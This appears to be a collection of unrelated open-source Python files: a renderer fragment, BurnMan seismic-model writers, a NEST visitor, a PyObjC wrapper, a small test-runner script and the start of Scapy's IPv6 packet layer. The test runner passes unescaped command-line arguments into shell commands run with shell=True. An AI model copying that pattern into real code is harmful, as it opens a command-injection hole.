self.atlas = texture_font.TextureAtlas(depth=3)
def attrib_pointer(self, attrib, stride, offset, vbo):
size, data_type = self.ATTRIBUTES[attrib]
loc = self.attrib_loc[attrib]
if loc >= 0:
gl.glVertexAttribPointer(loc, size, data_type, gl.GL_FALSE, stride, vbo + offset)
return self.TYPE_LEN[data_type] * size
def enable_attribs(self):
for i in self.attrib_loc.values():
if i >= 0:
gl.glEnableVertexAttribArray(i)
def disable_attribs(self):
for i in self.attrib_loc.values():
if i >= 0:
gl.glDisableVertexAttribArray(i)
def draw(self, time, layout):
gl.glActiveTexture(gl.GL_TEXTURE0)
gl.glBindTexture(gl.GL_TEXTURE_2D, self.atlas.texid)
gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
gl.glEnable(gl.GL_BLEND)
with self.shader:
gl.glUniform1i(self.l_tex, 0)
gl.glUniform1f(self.l_time, time)
layout.draw(time, self)
def reset(self):
self.atlas = texture_font.TextureAtlas(depth=3)
if __name__ == "__main__":
import sys, song, graphics
s = song.Song(sys.argv[1])
display = graphics.Display(1280,720)
renderer = Renderer(display)
layout = SongLayout(s, list(s.variants.keys())[-1], renderer)
def render():
song_time = 1
while True:
gl.glClearColor(0, 0.3, 0, 1)
gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
gl.glLoadIdentity()
renderer.draw(song_time, layout)
song_time += 1/70.0
yield None
display.set_render_gen(render)
display.main_loop()
|
yacoob/blitzloop
|
blitzloop/layout.py
|
Python
|
gpl-2.0
| 24,324
|
# This file is part of BurnMan - a thermoelastic and thermodynamic toolkit for the Earth and Planetary Sciences
# Copyright (C) 2012 - 2015 by the BurnMan team, released under the GNU
# GPL v2 or later.
from __future__ import absolute_import
import numpy as np
import warnings
import scipy.integrate
import matplotlib.pyplot as plt
import pkgutil
from . import tools
from . import constants
from . import seismic
from . import geotherm
def write_axisem_input(rock, min_depth=670.e3, max_depth=2890.e3, T0= 1900, filename='axisem_burnmantestrock.txt',
axisem_ref='axisem_prem_ani_noocean.txt', plotting=False):
"""
Writing velocities and densities to AXISEM (www.axisem.info) input file
Default is set to replacing the lower mantle with the BurnMan rock
Note:
- This implementation uses PREM to convert from depths to pressures to compute at
- This implementation assumes an adiabatic temperature profile, only T0 at min_depth can be set
- Currently, it only honors the discontinuities already in the synthetic input file, so it is best
to only replace certain layers with burnman values (this should be improved in the future).
Parameters
----------
rock : burnman.Composite()
Composition to implement in the model
min_depth : float
minimum depth to replace model (m) (default = 670 km)
max_depth : float
minimum depth to replace model (m) (default = 2890 km)
T0 : float
Anchor temperature at min_depth for adiabatic profile (K) (default=1900)
filename: string
Output filename (default ='axisem_burnmantestrock.txt')
axisem_ref: string
Input filename (in burnman/data/input_seismic/) (default = 'axisem_prem_ani_noocean.txt')
plotting: Boolean
True means plot of the old model and replaced model will be shown (default = False)
"""
# Load reference input
datastream = pkgutil.get_data('burnman', 'data/input_seismic/' + axisem_ref)
lines = [line.strip()
for line in datastream.decode('ascii').split('\n') if line.strip()]
table = []
for line in lines[18:]:
numbers = np.fromstring(line, sep=' ')
if len(numbers)>0:
if line[0] != "#" and line[0] != "%":
table.append(numbers)
table = np.array(table)
ref_radius = table[:, 0]
ref_depth = 6371.e3 - ref_radius
ref_density = table[:, 1]
ref_vpv = table[:, 2]
ref_vsv = table[:, 3]
ref_Qk = table[:, 4]
ref_Qmu = table[:, 5]
ref_vph = table[:, 6]
ref_vsh = table[:, 7]
ref_eta = table[:, 8]
# Cutting out range to input in Axisem reference file (currently the lower mantle)
indrange = [x for x in range(len(ref_depth)) if ref_depth[
x] > min_depth and ref_depth[x] < max_depth]
# pad both ends to include up to discontinuity, bit of a hack...
indrange.insert(0, indrange[0] - 1)
indrange.append(indrange[-1] + 1)
# Invert depthrange so adiabatic computations work!
depthrange = ref_depth[indrange]
# convert depths to pressures
pressures = seismic.PREM().pressure(depthrange)
# Computing adiabatic temperatures. T0 is an input parameter!
T0 = T0 # K
temperatures = geotherm.adiabatic(pressures, T0, rock)
print("Calculations are done for:")
rock.debug_print()
rock_vp, rock_vs, rock_rho = rock.evaluate(
['v_p', 'v_s', 'density'], pressures, temperatures)
discontinuity =0
# WRITE OUT FILE
f = open(filename, 'w')
print('Writing ' + filename + ' ...')
f.write('# Input file '+ filename +' for AXISEM created using BurnMan, replacing ' + axisem_ref+ ' between ' +str(np.round(min_depth/1.e3)) + ' and ' + str(np.round(max_depth /1.e3)) +' km \n')
f.write('NAME ' + filename + '\n')
for line in lines[2:18]:
f.write(line[:-1] + '\n')
for i in range(indrange[0]):
if i>0 and ref_radius[i] ==ref_radius[i-1]:
discontinuity = discontinuity + 1
f.write('# Discontinuity ' +str(discontinuity) + ', depth: '+ str(np.round(ref_depth[i]/1.e3,decimals=2)) +' km \n')
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], ref_density[i], ref_vpv[i], ref_vsv[i], ref_Qk[i],
ref_Qmu[i], ref_vph[i], ref_vsh[i], ref_eta[i]))
for i in range(indrange[0], indrange[-1]):
ind2 = -1 + i - indrange[0]
if ref_radius[i] ==ref_radius[i-1]:
discontinuity = discontinuity + 1
f.write('# Discontinuity '+ str(discontinuity) + ', depth: '+ str(np.round(ref_depth[i]/1.e3,decimals=2))+' km \n')
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], rock_rho[ind2], rock_vp[ind2], rock_vs[ind2], ref_Qk[i],
ref_Qmu[i], rock_vp[ind2], rock_vs[ind2], ref_eta[i]))
for i in range(indrange[-1], len(ref_radius)):
if ref_radius[i] ==ref_radius[i-1]:
discontinuity = discontinuity + 1
f.write('# Discontinuity ' +str(discontinuity) + ', depth: '+ str(np.round(ref_depth[i]/1.e3,decimals=2))+' km \n')
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], ref_density[i], ref_vpv[i], ref_vsv[i], ref_Qk[i],
ref_Qmu[i], ref_vph[i], ref_vsh[i], ref_eta[i]))
f.close()
if plotting:
# plot vp
plt.plot(ref_depth / 1.e3, ref_vph / 1.e3, color='g', linestyle='-', label='vp')
plt.plot(depthrange / 1.e3, rock_vp / 1.e3, color='g', linestyle='-',
marker='o', markerfacecolor='g', markersize=1)
# plot Vs
plt.plot(ref_depth / 1.e3, ref_vsh / 1.e3, color='b', linestyle='-', label='vs')
plt.plot(depthrange / 1.e3, rock_vs / 1.e3, color='b', linestyle='-',
marker='o', markerfacecolor='b', markersize=1)
# plot density
plt.plot(ref_depth / 1.e3, ref_density / 1.e3, color='r', linestyle='-', label='density')
plt.plot(depthrange / 1.e3, rock_rho / 1.e3, color='r', linestyle='-',
marker='o', markerfacecolor='r', markersize=1)
plt.title(filename + ' = ' + axisem_ref + ' replaced between ' +
str(min_depth / 1.e3) + ' and ' + str(max_depth / 1.e3) + ' km')
plt.legend(loc='lower right')
plt.show()
def write_mineos_input(rock, min_depth=670.e3, max_depth=2890.e3, T0 = 1900, filename='mineos_burnmantestrock.txt',
mineos_ref='mineos_prem_noocean.txt', plotting=False):
"""
Writing velocities and densities to Mineos (https://geodynamics.org/cig/software/mineos/) input file
Default is set to replacing the lower mantle with the BurnMan rock
Note:
- This implementation uses PREM to convert from depths to pressures to compute at
- This implementation assumes an adiabatic temperature profile, only T0 at min_depth can be set
- Currently, it only honors the discontinuities already in the synthetic input file, so it is best
to only replace certain layers with burnman values (this should be improved in the future).
Parameters
----------
rock : burnman.Composite()
Composition to implement in the model
min_depth : float
minimum depth to replace model (m) (default = 670 km)
max_depth : float
minimum depth to replace model (m) (default = 2890 km)
T0 : float
Anchor temperature at min_depth for adiabatic profile (K) (default=1900)
filename: string
Output filename (default ='mineos_burnmantestrock.txt')
axisem_ref: string
Input filename (in burnman/data/input_seismic/) (default = 'mineos_prem_noocean.txt')
plotting: Boolean
True means plot of the old model and replaced model will be shown (default = False)
"""
# Load reference input
datastream = pkgutil.get_data('burnman', 'data/input_seismic/' + mineos_ref)
lines = [line.strip()
for line in datastream.decode('ascii').split('\n') if line.strip()]
table=[]
for line in lines[3:]:
numbers = np.fromstring(line, sep=' ')
table.append(numbers)
table = np.array(table)
ref_radius = table[:, 0]
ref_depth = 6371.e3 - ref_radius
ref_density = table[:, 1]
ref_vpv = table[:, 2]
ref_vsv = table[:, 3]
ref_Qk = table[:, 4]
ref_Qmu = table[:, 5]
ref_vph = table[:, 6]
ref_vsh = table[:, 7]
ref_eta = table[:, 8]
# Cutting out range to input in Mineos (currently the lower mantle)
indrange = [x for x in range(len(ref_depth)) if ref_depth[
x] > min_depth and ref_depth[x] < max_depth]
# pad both ends to include up to discontinuity, bit of a hack...
indrange.insert(0, indrange[0] - 1)
indrange.append(indrange[-1] + 1)
# Invert depthrange so adiabatic computations work!
depthrange = ref_depth[indrange][::-1]
# convert depths to pressures
pressures = seismic.PREM().pressure(depthrange)
# Computing adiabatic temperatures. T0 is a choice!
T0 = T0 # K
temperatures = geotherm.adiabatic(pressures, T0, rock)
print("Calculations are done for:")
rock.debug_print()
rock_vp, rock_vs, rock_rho = rock.evaluate(
['v_p', 'v_s', 'density'], pressures, temperatures)
# WRITE OUT FILE
f = open(filename , 'w')
print('Writing ' + filename + ' ...')
f.write(lines[0][:-2] + ' + ' + filename + '\n')
for line in lines[1:3]:
f.write(line[:-2] + '\n')
for i in range(indrange[0]):
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], ref_density[i], ref_vpv[i], ref_vsv[i], ref_Qk[i],
ref_Qmu[i], ref_vph[i], ref_vsh[i], ref_eta[i]))
for i in range(indrange[0], indrange[-1]):
ind2 = -1 - i + indrange[0]
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], rock_rho[ind2], rock_vp[ind2], rock_vs[ind2], ref_Qk[i],
ref_Qmu[i], rock_vp[ind2], rock_vs[ind2], ref_eta[i]))
for i in range(indrange[-1], len(ref_radius)):
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], ref_density[i], ref_vpv[i], ref_vsv[i], ref_Qk[i],
ref_Qmu[i], ref_vph[i], ref_vsh[i], ref_eta[i]))
f.close()
if plotting:
# plot vp
plt.plot(ref_depth / 1.e3, ref_vph / 1.e3, color='g', linestyle='-', label='vp')
plt.plot(depthrange / 1.e3, rock_vp / 1.e3, color='g', linestyle='-',
marker='o', markerfacecolor='g', markersize=1)
# plot Vs
plt.plot(ref_depth / 1.e3, ref_vsh / 1.e3, color='b', linestyle='-', label='vs')
plt.plot(depthrange / 1.e3, rock_vs / 1.e3, color='b', linestyle='-',
marker='o', markerfacecolor='b', markersize=1)
# plot density
plt.plot(ref_depth / 1.e3, ref_density / 1.e3, color='r', linestyle='-', label='density')
plt.plot(depthrange / 1.e3, rock_rho / 1.e3, color='r', linestyle='-',
marker='o', markerfacecolor='r', markersize=1)
plt.title(filename + ' = ' + mineos_ref + ' replaced between ' +
str(min_depth / 1.e3) + ' and ' + str(max_depth / 1.e3) + ' km')
plt.legend(loc='lower right')
plt.show()
|
ian-r-rose/burnman
|
burnman/output_seismo.py
|
Python
|
gpl-2.0
| 11,627
|
#
# ast_parent_aware_visitor.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
from pynestml.utils.stack import Stack
from pynestml.visitors.ast_visitor import ASTVisitor
class ASTParentAwareVisitor(ASTVisitor):
"""
The parent aware visitor storing a trace. This visitor enables a given visitor to inspect the corresponding
parent node.
Attributes:
parents type(Stack): A stack containing the predecessor of this node.
"""
def __init__(self):
super(ASTParentAwareVisitor, self).__init__()
self.parents = Stack()
def handle(self, _node):
self.visit(_node)
self.parents.push(_node)
self.traverse(_node)
self.parents.pop()
self.endvisit(_node)
return
|
kperun/nestml
|
pynestml/visitors/ast_parent_aware_visitor.py
|
Python
|
gpl-2.0
| 1,391
|
'''
Python mapping for the Accounts framework.
This module does not contain docstrings for the wrapped code, check Apple's
documentation for details on how to use these functions and classes.
'''
import objc
import sys
import Foundation
from Accounts import _metadata
sys.modules['Accounts'] = mod = objc.ObjCLazyModule(
"Accounts",
"com.apple.Accounts",
objc.pathForFramework("/System/Library/Frameworks/Accounts.framework"),
_metadata.__dict__, None, {
'__doc__': __doc__,
'objc': objc,
'__path__': __path__,
}, (Foundation,))
|
rishabhmalhotra/FireSync
|
PyObjC/Accounts/__init__.py
|
Python
|
gpl-2.0
| 577
|
# Just pretend this is bash... of evil! Muhahahaha!
import subprocess, os, sys
sauronHome = "jsevil"
args = []
# Get special Ogres
def getSpecialOgres():
specialOgres = []
for specialOgre in sys.argv:
args.append(specialOgre)
specialOgreHome = "jsevil/%s" % (specialOgre)
if (os.path.isdir(specialOgreHome)):
specialOgres.append(specialOgre)
else:
specialOgres.append("Ogre doesn't want to dance")
if (len(specialOgres) < 2):
specialOgres.append("Make them all dance")
return specialOgres
# Summon all ogres
def summonAllOgres():
ogres = []
for ogre in os.listdir(sauronHome):
ogres.append(ogre)
return ogres
# Make ogre dance
def ogreDance(ogreName):
result = "jsevil/%s/etc/diff/result.txt" % (ogreName)
command = "node jsevil/%s/bin/integration.js >" % (ogreName)
command += result;
enchant = command;
enchant += " && printf '\x1b[3m'"
enchant += " && echo '%s->expects:'" % (ogreName)
enchant += " && printf '\x1b[0m'"
enchant += " && cat %s | sed -n 's/^./\t&/p'" % (result)
enchant += " && echo '========================================'"
return enchant
# Make ogres dance
def makeOgresDance(ogres, firstOgre):
for ogre in range(firstOgre, len(ogres)):
if (ogres[ogre] != "Ogre doesn't want to dance"):
command = ogreDance(ogres[ogre])
else:
command = "echo 'bad name: %s'" % (args[ogre])
subprocess.call(command, shell=True)
# Make decision
specialOgres = getSpecialOgres()
if (specialOgres[1] == "Make them all dance"):
ogres = summonAllOgres()
makeOgresDance(ogres, 0)
else:
makeOgresDance(specialOgres, 1)
|
grebnafets/jsevil
|
tools/python/integration/showUnset.py
|
Python
|
gpl-2.0
| 1,578
|
#! /usr/bin/env python
#############################################################################
## ##
## inet6.py --- IPv6 support for Scapy ##
## see http://natisbad.org/IPv6/ ##
## for more informations ##
## ##
## Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> ##
## Arnaud Ebalard <arnaud.ebalard@eads.net> ##
## ##
## This program is free software; you can redistribute it and/or modify it ##
## under the terms of the GNU General Public License version 2 as ##
## published by the Free Software Foundation. ##
## ##
## This program is distributed in the hope that it will be useful, but ##
## WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ##
## General Public License for more details. ##
## ##
#############################################################################
"""
IPv6 (Internet Protocol v6).
"""
import socket
if not socket.has_ipv6:
raise socket.error("can't use AF_INET6, IPv6 is disabled")
if not hasattr(socket, "IPPROTO_IPV6"):
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = 4
from scapy.config import conf
from scapy.layers.l2 import *
from scapy.layers.inet import *
from scapy.fields import *
from scapy.packet import *
from scapy.volatile import *
from scapy.sendrecv import sr,sr1,srp1
from scapy.as_resolvers import AS_resolver_riswhois
from scapy.supersocket import SuperSocket,L3RawSocket
from scapy.arch import *
from scapy.utils6 import *
#############################################################################
# Helpers ##
#############################################################################
def get_cls(name, fallback_cls):
return globals().get(name, fallback_cls)
##########################
## Neighbor cache stuff ##
##########################
conf.netcache.new_cache("in6_neighbor", 120)
def neighsol(addr, src, iface, timeout=1, chainCC=0):
"""
Sends an ICMPv6 Neighbor Solicitation message to get the MAC address
of the neighbor with specified IPv6 address addr. 'src' address is
used as source of the message. Message is sent on iface. By default,
timeout waiting for an answer is 1 second.
If no answer is gathered, None is returned. Else, the answer is
returned (ethernet frame).
"""
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255)
p /= ICMPv6ND_NS(tgt=addr)
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
chainCC=chainCC)
return res
def getmacbyip6(ip6, chainCC=0):
"""
Returns the mac address to be used for provided 'ip6' peer.
neighborCache.get() method is used on instantiated neighbor cache.
Resolution mechanism is described in associated doc string.
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
return mac
iff,a,nh = conf.route6.route(ip6, dev=conf.iface6)
if iff == LOOPBACK_NAME:
return "ff:ff:ff:ff:ff:ff"
if nh != '::':
ip6 = nh # Found next hop
mac = conf.netcache.in6_neighbor.get(ip6)
if mac:
return mac
res = neighsol(ip6, a, iff, chainCC=chainCC)
if res is not None:
if ICMPv6NDOptDstLLAddr in res:
mac = res[ICMPv6NDOptDstLLAddr].lladdr
else:
mac = res.src
conf.netcache.in6_neighbor[ip6] = mac
return mac
return None
#############################################################################
#############################################################################
### IPv6 addresses manipulation routines ###
#############################################################################
#############################################################################
class Net6(Gen): # syntax ex. fec0::/126
"""Generate a list of IPv6s from a network address or a name"""
name = "ipv6"
ipaddress = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")
def __init__(self, net):
self.repr = net
tmp = net.split('/')+["128"]
if not self.ipaddress.match(net):
tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0]
netmask = int(tmp[1])
self.net = inet_pton(socket.AF_INET6, tmp[0])
self.mask = in6_cidr2mask(netmask)
self.plen = netmask
def __iter__(self):
def m8(i):
if i % 8 == 0:
return i
tuple = filter(lambda x: m8(x), xrange(8, 129))
a = in6_and(self.net, self.mask)
tmp = map(lambda x: x, struct.unpack('16B', a))
def parse_digit(a, netmask):
netmask = min(8,max(netmask,0))
a = (int(a) & (0xffL<<netmask),(int(a) | (0xffL>>(8-netmask)))+1)
return a
self.parsed = map(lambda x,y: parse_digit(x,y), tmp, map(lambda x,nm=self.plen: x-nm, tuple))
def rec(n, l):
if n and n % 2 == 0:
sep = ':'
else:
sep = ''
if n == 16:
return l
else:
ll = []
for i in xrange(*self.parsed[n]):
for y in l:
ll += [y+sep+'%.2x'%i]
return rec(n+1, ll)
return iter(rec(0, ['']))
def __repr__(self):
return "Net6(%r)" % self.repr
#############################################################################
#############################################################################
### IPv6 Class ###
#############################################################################
#############################################################################
class IP6Field(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "16s")
def h2i(self, pkt, x):
if type(x) is str:
try:
x = in6_ptop(x)
except socket.error:
x = Net6(x)
elif type(x) is list:
x = map(Net6, x)
return x
def i2m(self, pkt, x):
return inet_pton(socket.AF_INET6, x)
def m2i(self, pkt, x):
return inet_ntop(socket.AF_INET6, x)
def any2i(self, pkt, x):
return self.h2i(pkt,x)
def i2repr(self, pkt, x):
if x is None:
return self.i2h(pkt,x)
elif not isinstance(x, Net6) and not type(x) is list:
if in6_isaddrTeredo(x): # print Teredo info
server, flag, maddr, mport = teredoAddrExtractInfo(x)
return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport)
elif in6_isaddr6to4(x): # print encapsulated address
vaddr = in6_6to4ExtractAddr(x)
return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
return self.i2h(pkt, x) # No specific information to return
def randval(self):
return RandIP6()
class SourceIP6Field(IP6Field):
__slots__ = ["dstname"]
def __init__(self, name, dstname):
IP6Field.__init__(self, name, None)
self.dstname = dstname
def i2m(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
if isinstance(dst,Gen):
r = map(conf.route6.route, dst)
r.sort()
if r[0] == r[-1]:
x=r[0][1]
else:
warning("More than one possible route for %s"%repr(dst))
return None
else:
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2h(self, pkt, x)
class DestIP6Field(IP6Field, DestField):
bindings = {}
def __init__(self, name, default):
IP6Field.__init__(self, name, None)
DestField.__init__(self, name, default)
def i2m(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2h(self, pkt, x)
ipv6nh = { 0:"Hop-by-Hop Option Header",
4:"IP",
6:"TCP",
17:"UDP",
41:"IPv6",
43:"Routing Header",
44:"Fragment Header",
47:"GRE",
50:"ESP Header",
51:"AH Header",
58:"ICMPv6",
59:"No Next Header",
60:"Destination Option Header",
132:"SCTP",
135:"Mobility Header"}
ipv6nhcls = { 0: "IPv6ExtHdrHopByHop",
4: "IP",
6: "TCP",
17: "UDP",
43: "IPv6ExtHdrRouting",
44: "IPv6ExtHdrFragment",
#50: "IPv6ExtHrESP",
#51: "IPv6ExtHdrAH",
58: "ICMPv6Unknown",
59: "Raw",
60: "IPv6ExtHdrDestOpt" }
class IP6ListField(StrField):
__slots__ = ["count_from", "length_from"]
islist = 1
def __init__(self, name, default, count_from=None, length_from=None):
if default is None:
default = []
StrField.__init__(self, name, default)
self.count_from = count_from
self.length_from = length_from
def i2len(self, pkt, i):
return 16*len(i)
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
lst = []
ret = ""
remain = s
if l is not None:
remain,ret = s[:l],s[l:]
while remain:
if c is not None:
if c <= 0:
break
c -= 1
addr = inet_ntop(socket.AF_INET6, remain[:16])
lst.append(addr)
remain = remain[16:]
return remain+ret,lst
def i2m(self, pkt, x):
s = ''
for y in x:
try:
y = inet_pton(socket.AF_INET6, y)
except:
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
y = inet_pton(socket.AF_INET6, y)
s += y
return s
def i2repr(self,pkt,x):
s = []
if x == None:
return "[]"
for y in x:
s.append('%s' % y)
return "[ %s ]" % (", ".join(s))
class _IPv6GuessPayload:
name = "Dummy class that implements guess_payload_class() for IPv6"
def default_payload_class(self,p):
if self.nh == 58: # ICMPv6
t = ord(p[0])
if len(p) > 2 and t == 139 or t == 140: # Node Info Query
return _niquery_guesser(p)
if len(p) >= icmp6typesminhdrlen.get(t, sys.maxint): # Other ICMPv6 messages
return get_cls(icmp6typescls.get(t,"Raw"), "Raw")
return Raw
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
return _mip6_mhtype2cls.get(ord(p[2]), MIP6MH_Generic)
else:
return get_cls(ipv6nhcls.get(self.nh,"Raw"), "Raw")
class IPv6(_IPv6GuessPayload, Packet, IPTools):
name = "IPv6"
fields_desc = [ BitField("version" , 6 , 4),
BitField("tc", 0, 8), #TODO: IPv6, ByteField ?
BitField("fl", 0, 20),
ShortField("plen", None),
ByteEnumField("nh", 59, ipv6nh),
ByteField("hlim", 64),
SourceIP6Field("src", "dst"), # dst is for src @ selection
DestIP6Field("dst", "::1") ]
def route(self):
dst = self.dst
if isinstance(dst,Gen):
dst = iter(dst).next()
return conf.route6.route(dst)
def mysummary(self):
return "%s > %s (%i)" % (self.src,self.dst, self.nh)
def post_build(self, p, pay):
p += pay
if self.plen is None:
l = len(p) - 40
p = p[:4]+struct.pack("!H", l)+p[6:]
return p
def extract_padding(self, s):
l = self.plen
return s[:l], s[l:]
def hashret(self):
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
if self.payload.type < 128:
return self.payload.payload.hashret()
elif (self.payload.type in [133,134,135,136,144,145]):
return struct.pack("B", self.nh)+self.payload.hashret()
nh = self.nh
sd = self.dst
ss = self.src
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
# With routing header, the destination is the last
# address of the IPv6 list if segleft > 0
nh = self.payload.nh
try:
sd = self.addresses[-1]
except IndexError:
sd = '::1'
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6
# could be anything from the original list ...
if 1:
sd = inet_pton(socket.AF_INET6, sd)
for a in self.addresses:
a = inet_pton(socket.AF_INET6, a)
sd = strxor(sd, a)
sd = inet_ntop(socket.AF_INET6, sd)
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
nh = self.payload.nh
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
nh = self.payload.nh
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
foundhao = None
for o in self.payload.options:
if isinstance(o, HAO):
foundhao = o
if foundhao:
nh = self.payload.nh # XXX what if another extension follows ?
ss = foundhao.hoa
if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
sd = inet_pton(socket.AF_INET6, sd)
ss = inet_pton(socket.AF_INET6, self.src)
return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()
else:
return struct.pack("B", nh)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, IPv6): # self is reply, other is request
return False
if conf.checkIPaddr:
ss = inet_pton(socket.AF_INET6, self.src)
sd = inet_pton(socket.AF_INET6, self.dst)
os = inet_pton(socket.AF_INET6, other.src)
od = inet_pton(socket.AF_INET6, other.dst)
# request was sent to a multicast address (other.dst)
# Check reply destination addr matches request source addr (i.e
# sd == os) except when reply is multicasted too
# XXX test mcast scope matching ?
if in6_ismaddr(other.dst):
if in6_ismaddr(self.dst):
if ((od == sd) or
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
return self.payload.answers(other.payload)
return False
if (os == sd):
return self.payload.answers(other.payload)
return False
elif (sd != os): # or ss != od): <- removed for ICMP errors
return False
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
# ICMPv6 Error message -> generated by IPv6 packet
# Note : at the moment, we jump the ICMPv6 specific class
# to call answers() method of erroneous packet (over
# initial packet). There can be cases where an ICMPv6 error
# class could implement a specific answers method that perform
# a specific task. Currently, don't see any use ...
return self.payload.payload.answers(other)
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
return self.payload.answers(other.payload.payload)
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
return self.payload.answers(other.payload.payload)
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
return self.payload.payload.answers(other.payload.payload)
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance
return self.payload.payload.answers(other.payload)
else:
if (self.nh != other.nh):
return False
return self.payload.answers(other.payload)
conf.neighbor.register_l3(Ether, IPv6, lambda l2,l3: getmacbyip6(l3.dst))
class IPerror6(IPv6):
name = "IPv6 in ICMPv6"
def answers(self, other):
if not isinstance(other, IPv6):
return False
sd = inet_pton(socket.AF_INET6, self.dst)
ss = inet_pton(socket.AF_INET6, self.src)
od = inet_pton(socket.AF_INET6, other.dst)
os = inet_pton(socket.AF_INET6, other.src)
# Make sure that the ICMPv6 error is related to the packet scapy sent
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
# find upper layer for self (possible citation)
selfup = self.payload
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
selfup = selfup.payload
# find upper layer for other (initial packet). Also look for RH
otherup = other.payload
request_has_rh = False
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
if isinstance(otherup, IPv6ExtHdrRouting):
request_has_rh = True
otherup = otherup.payload
if ((ss == os and sd == od) or # <- Basic case
(ss == os and request_has_rh)): # <- Request has a RH :
# don't check dst address
# Let's deal with possible MSS Clamping
if (isinstance(selfup, TCP) and
isinstance(otherup, TCP) and
selfup.options != otherup.options): # seems clamped
# Save fields modified by MSS clamping
old_otherup_opts = otherup.options
old_otherup_cksum = otherup.chksum
old_otherup_dataofs = otherup.dataofs
old_selfup_opts = selfup.options
old_selfup_cksum = selfup.chksum
old_selfup_dataofs = selfup.dataofs
# Nullify them
otherup.options = []
otherup.chksum = 0
otherup.dataofs = 0
selfup.options = []
selfup.chksum = 0
selfup.dataofs = 0
# Test it and save result
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
res = s1[:l] == s2[:l]
# recall saved values
otherup.options = old_otherup_opts
otherup.chksum = old_otherup_cksum
otherup.dataofs = old_otherup_dataofs
selfup.options = old_selfup_opts
selfup.chksum = old_selfup_cksum
selfup.dataofs = old_selfup_dataofs
return res
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
return s1[:l] == s2[:l]
return False
def mysummary(self):
return Packet.mysummary(self)
#############################################################################
#############################################################################
